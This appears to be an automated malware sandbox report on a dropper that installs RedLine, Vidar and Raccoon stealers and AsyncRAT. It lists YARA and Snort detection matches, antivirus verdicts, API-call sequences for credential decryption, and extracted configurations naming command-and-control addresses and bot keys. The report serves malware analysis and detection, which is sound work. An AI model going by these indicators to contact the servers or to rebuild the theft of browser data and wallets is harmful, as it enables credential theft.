Process Memory Space: brokerius.exe PID: 4472	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x3690:$a1: BinanceChainWallet 0x11bba:$a2: wallet.dat 0x1f87b:$a2: wallet.dat 0x2b5c:$a3: SOFTWARE\monero-project\monero-core 0x12567:$b1: CC\%s_%s.txt 0x125a0:$b1: CC\%s_%s.txt 0x20228:$b1: CC\%s_%s.txt 0x20261:$b1: CC\%s_%s.txt 0x12230:$b2: History\%s_%s.txt 0x12370:$b2: History\%s_%s.txt 0x1fef1:$b2: History\%s_%s.txt 0x20031:$b2: History\%s_%s.txt 0x1221c:$b3: Autofill\%s_%s.txt 0x1235d:$b3: Autofill\%s_%s.txt 0x1fedd:$b3: Autofill\%s_%s.txt 0x2001e:$b3: Autofill\%s_%s.txt
Process Memory Space: ffnameedit.exe PID: 8164	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ffnameedit.exe PID: 8164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WW1.exe PID: 6840	Windows_Trojan_Vidar_114258d5	unknown	unknown	0xae24:$a2: wallet.dat 0x1788e:$a2: wallet.dat 0xb7ba:$b1: CC\%s_%s.txt 0xb7f3:$b1: CC\%s_%s.txt 0x18224:$b1: CC\%s_%s.txt 0x1825d:$b1: CC\%s_%s.txt 0xb483:$b2: History\%s_%s.txt 0xb5c3:$b2: History\%s_%s.txt 0x17eed:$b2: History\%s_%s.txt 0x1802d:$b2: History\%s_%s.txt 0xb46f:$b3: Autofill\%s_%s.txt 0xb5b0:$b3: Autofill\%s_%s.txt 0x17ed9:$b3: Autofill\%s_%s.txt 0x1801a:$b3: Autofill\%s_%s.txt
Process Memory Space: SETUP_~1.EXE PID: 7812	JoeSecurity_MSIL_Downloader_Generic	Yara detected MSIL_Downloader_Generic	Joe Security
Process Memory Space: SETUP_~1.EXE PID: 7812	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.kukurzka9000.exe.400000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
23.2.kukurzka9000.exe.22b0174.1.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
20.3.F0geI.exe.5d0000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
26.0.namdoitntn.exe.2f0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
26.0.namdoitntn.exe.2f0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.0.namdoitntn.exe.2f0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19c98:$pat14: , CommandLine: 0x12cd4:$v2_1: ListOfProcesses 0x12a94:$v4_3: base64str 0x136cf:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x1296b:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eaa:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
26.0.namdoitntn.exe.2f0000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13701:$a1: get_encrypted_key 0x12e03:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13004:$a4: GetBrowsers 0x19a28:$a5: Software\Valve\SteamLogin Data 0x192c8:$a6: %appdata%\ 0x12b28:$a7: ScanPasswords
36.0.ffnameedit.exe.140000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.0.ffnameedit.exe.140000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19c9c:$pat14: , CommandLine: 0x12cd0:$v2_1: ListOfProcesses 0x12a90:$v4_3: base64str 0x136cb:$v4_4: stringKey 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12967:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ea8:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField
36.0.ffnameedit.exe.140000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x136fd:$a1: get_encrypted_key 0x12dff:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13000:$a4: GetBrowsers 0x19a2c:$a5: Software\Valve\SteamLogin Data 0x192cc:$a6: %appdata%\ 0x12b24:$a7: ScanPasswords
20.3.F0geI.exe.5d0000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
20.2.F0geI.exe.400000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
31.0.jshainx.exe.3e0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.0.jshainx.exe.3e0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca8:$pat14: , CommandLine: 0x12ccd:$v2_1: ListOfProcesses 0x12a8d:$v4_3: base64str 0x136d1:$v4_4: stringKey 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12964:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eab:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField
31.0.jshainx.exe.3e0000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13703:$a1: get_encrypted_key 0x12dfc:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13006:$a4: GetBrowsers 0x19a38:$a5: Software\Valve\SteamLogin Data 0x192d8:$a6: %appdata%\ 0x12b21:$a7: ScanPasswords
23.2.kukurzka9000.exe.22b0174.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
1.3.WSkT8d093C.exe.3af5a14.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38318:$a2: wallet.dat 0x387a9:$b1: CC\%s_%s.txt 0x384a9:$b2: History\%s_%s.txt 0x38495:$b3: Autofill\%s_%s.txt
23.2.kukurzka9000.exe.400000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
20.2.F0geI.exe.4c0e67.1.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
20.2.F0geI.exe.4c0e67.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
20.2.F0geI.exe.400000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
33.2.brokerius.exe.ce0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
1.3.WSkT8d093C.exe.3adae14.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.WSkT8d093C.exe.3adae14.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1809c:$pat14: , CommandLine: 0x110d0:$v2_1: ListOfProcesses 0x10e90:$v4_3: base64str 0x11acb:$v4_4: stringKey 0xf63f:$v4_5: BytesToStringConverted 0xe73a:$v4_6: FromBase64 0xfbb2:$v4_8: procName 0xfec8:$v5_1: DownloadAndExecuteUpdate 0x10d67:$v5_2: ITaskProcessor 0xfeb6:$v5_3: CommandLineUpdate 0xfea7:$v5_4: DownloadUpdate 0x102a8:$v5_5: FileScanning 0xf860:$v5_7: RecordHeaderField 0xf4c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.3.WSkT8d093C.exe.3adae14.1.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x11afd:$a1: get_encrypted_key 0x111ff:$a2: get_PassedPaths 0xfc2a:$a3: ChromeGetLocalName 0x11400:$a4: GetBrowsers 0x17e2c:$a5: Software\Valve\SteamLogin Data 0x176cc:$a6: %appdata%\ 0x10f24:$a7: ScanPasswords
33.0.brokerius.exe.ce0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
37.2.WW1.exe.12a0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f18:$a2: wallet.dat 0x393a9:$b1: CC\%s_%s.txt 0x390a9:$b2: History\%s_%s.txt 0x39095:$b3: Autofill\%s_%s.txt
30.0.safert44.exe.c90000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1c60:$pat14: , CommandLine: 0x25b6b:$v2_1: ListOfProcesses 0x25920:$v4_3: base64str 0x265de:$v4_4: stringKey 0x23fa6:$v4_5: BytesToStringConverted 0x23080:$v4_6: FromBase64 0x24537:$v4_8: procName 0x24867:$v5_1: DownloadAndExecuteUpdate 0x257f7:$v5_2: ITaskProcessor 0x24855:$v5_3: CommandLineUpdate 0x24846:$v5_4: DownloadUpdate 0x24cbd:$v5_5: FileScanning 0x241cd:$v5_7: RecordHeaderField 0x23e0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
30.0.safert44.exe.c90000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26610:$a1: get_encrypted_key 0x25cb8:$a2: get_PassedPaths 0x245af:$a3: ChromeGetLocalName 0x25ec9:$a4: GetBrowsers 0x19f0:$a5: Software\Valve\SteamLogin Data 0x1290:$a6: %appdata%\ 0x259b4:$a7: ScanPasswords
29.0.real.exe.fc0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x372e4:$a2: wallet.dat 0x37701:$b1: CC\%s_%s.txt 0x37475:$b2: History\%s_%s.txt 0x37461:$b3: Autofill\%s_%s.txt
29.2.real.exe.fc0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x372e4:$a2: wallet.dat 0x37701:$b1: CC\%s_%s.txt 0x37475:$b2: History\%s_%s.txt 0x37461:$b3: Autofill\%s_%s.txt
37.0.WW1.exe.12a0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f18:$a2: wallet.dat 0x393a9:$b1: CC\%s_%s.txt 0x390a9:$b2: History\%s_%s.txt 0x39095:$b3: Autofill\%s_%s.txt
1.3.WSkT8d093C.exe.3af5a14.0.raw.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f18:$a2: wallet.dat 0x393a9:$b1: CC\%s_%s.txt 0x390a9:$b2: History\%s_%s.txt 0x39095:$b3: Autofill\%s_%s.txt
1.3.WSkT8d093C.exe.3adae14.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.WSkT8d093C.exe.3adae14.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.3.WSkT8d093C.exe.3adae14.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x574bc:$s5: delete[] 0x19c9c:$pat14: , CommandLine: 0x12cd0:$v2_1: ListOfProcesses 0x12a90:$v4_3: base64str 0x136cb:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12967:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ea8:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.3.WSkT8d093C.exe.3adae14.1.raw.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x136fd:$a1: get_encrypted_key 0x12dff:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13000:$a4: GetBrowsers 0x19a2c:$a5: Software\Valve\SteamLogin Data 0x192cc:$a6: %appdata%\ 0x12b24:$a7: ScanPasswords
1.3.WSkT8d093C.exe.3adae14.1.raw.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x53b18:$a2: wallet.dat 0x53fa9:$b1: CC\%s_%s.txt 0x53ca9:$b2: History\%s_%s.txt 0x53c95:$b3: Autofill\%s_%s.txt
Click to see the 33 entries

Snort Signatures

ET TROJAN Win32/RecordBreaker - Observed UA M1 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849774802038485 08/23/22-03:42:46.138066
SID:	2038485
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Observed UA M2 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849774802038486 08/23/22-03:42:57.736003
SID:	2038486
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Library Request - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849774802038487 08/23/22-03:42:57.736003
SID:	2038487
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 45.95.11.158 - Destination IP: 192.168.2.3

Timestamp:	45.95.11.158192.168.2.380497742036955 08/23/22-03:42:46.301580
SID:	2036955
Source Port:	80
Destination Port:	49774
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin M1 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849774802036934 08/23/22-03:42:46.138066
SID:	2036934
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://62.204.41.126:80	Avira URL Cloud: Label: malware
Source: http://135.181.104.248/1571	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Avira: detection malicious, Label: HEUR/AGEN.1251247
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Avira: detection malicious, Label: HEUR/AGEN.1203016
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Avira: detection malicious, Label: HEUR/AGEN.1250598
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Avira: detection malicious, Label: HEUR/AGEN.1250598
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Avira: detection malicious, Label: HEUR/AGEN.1210243
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Avira: detection malicious, Label: HEUR/AGEN.1251247
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Avira: detection malicious, Label: HEUR/AGEN.1251247

Multi AV Scanner detection for submitted file

Source: WSkT8d093C.exe	Virustotal: Detection: 48%			Perma Link
Source: WSkT8d093C.exe	ReversingLabs: Detection: 64%

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Metadefender: Detection: 64%			Perma Link
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Source: WSkT8d093C.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Joe Sandbox ML: detected

Source: 23.2.kukurzka9000.exe.22b0174.1.raw.unpack	Malware Configuration Extractor: Raccoon {"C2 url": ["http://193.56.146.177"], "Bot ID": "afb5c633c4650f69312baef49db9dfa4", "RC4_key1": "afb5c633c4650f69312baef49db9dfa4"}
Source: 26.0.namdoitntn.exe.2f0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.89.90.61:34589"], "Bot Id": "nam3", "Message": "Done", "Authorization Header": "64b900120bbceaa6a9c60e9079492895"}

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	20_2_00403236
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004027B8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	20_2_004027B8
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	20_2_00402CB8
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,	20_2_00406468
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	20_2_004017FA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040177F CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,	20_2_0040177F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,	23_2_00406468
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	23_2_004017FA
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040177F CryptBinaryToStringW,LocalAlloc,VirtualAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,	23_2_0040177F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	23_2_00403236
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004027B8 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	23_2_004027B8
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	23_2_00402CB8

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Unpacked PE file: 20.2.F0geI.exe.400000.0.unpack
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Unpacked PE file: 23.2.kukurzka9000.exe.400000.0.unpack

Source: WSkT8d093C.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.3:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.3:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:50076 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source:	Binary string: softokn3.pdbp source: softokn3.dll.20.dr
Source:	Binary string: wextract.pdb source: captain09876.exe, 00000022.00000002.790134700.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp, captain09876.exe, 00000022.00000000.361959135.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: wextract.pdbGCTL source: captain09876.exe, 00000022.00000002.790134700.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp, captain09876.exe, 00000022.00000000.361959135.00007FF786FD9000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\wiroguzaxun\lefereyocimuwu-fep\22\wipo\57_so.pdb source: F0geI.exe, 00000014.00000000.319863933.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.20.dr

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 20_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,

20_2_0040ABD8

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	20_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,	20_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	20_2_0040196E
